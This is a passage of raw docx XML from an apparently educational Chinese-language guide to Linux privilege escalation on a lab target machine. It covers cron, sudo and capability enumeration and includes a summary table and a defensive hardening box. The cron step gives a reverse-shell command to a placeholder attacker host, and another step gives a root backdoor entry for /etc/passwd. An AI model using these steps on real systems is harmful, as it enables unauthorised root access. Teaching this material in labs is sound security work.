        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">less</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">awk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若提示需要密码，可尝试弱口令（目标用户密码、常见默认凭据；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否成功完全取决于靶机用户密码强度）。若完全无法通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径不可行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤四：cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任务检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查每个脚本的权限。若发现当前用户可写的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属主脚本（如权限字符串为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rwxrwxrwx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或属组为当前用户组且可写），记录其路径。随后，可向该脚本追加反弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/&lt;ATTACKER_IP&gt;/&lt;PORT&gt; 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，占位符为攻击者实际</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②），等待</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发执行（通常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1–5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分钟，取决于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调度规则）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">脚本不可写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查脚本所在目录是否可写（即使脚本本身不可编辑，若目录可写，可以删除原脚本并新建同名恶意脚本，前提是当前用户对目录有写入权限）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：虚拟机时间可能不同步或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crond </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务未运行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认）。部分容器化靶机可能缺少完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤五：capabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">枚举与敏感文件检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd /etc/shadow /etc/sudoers /etc/ssh/sshd_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若发现异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capability（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_setuid+ep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_sys_admin+ep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应某些可执行文件），结合该文件功能判断利用可能。若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可写，可执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 &lt;NEW_PASSWORD&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成新密码哈希，然后追加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">newuser:&lt;HASH&gt;:0:0:root:/root:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到文件末尾（占位符，②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希值因所选密码和加密方式而异）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令执行总结表（通用语法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">①，具体路径/结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">枚举维度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">利用指示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SUID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">发现非标准</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SUID root </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">二进制，查</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> GTFOBins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">sudo </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">存在</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">(root) NOPASSWD:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">且命令可被滥用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">cron </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/crontab; ls -la /etc/cron.*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">root </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">属主脚本对当前用户可写</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">存在危险能力如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cap_setuid+ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">敏感文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la /etc/passwd /etc/shadow /etc/sudoers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">当前用户可读或可写关键系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：系统管理员视角的加固与审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">定期审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID/SGID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -o -perm -2000 -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成系统内所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SGID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件清单，与基线对比；任何新增或修改都应触发告警。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则最小化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计原则——每条规则必须指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">精确到参数的命令路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl restart apache2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
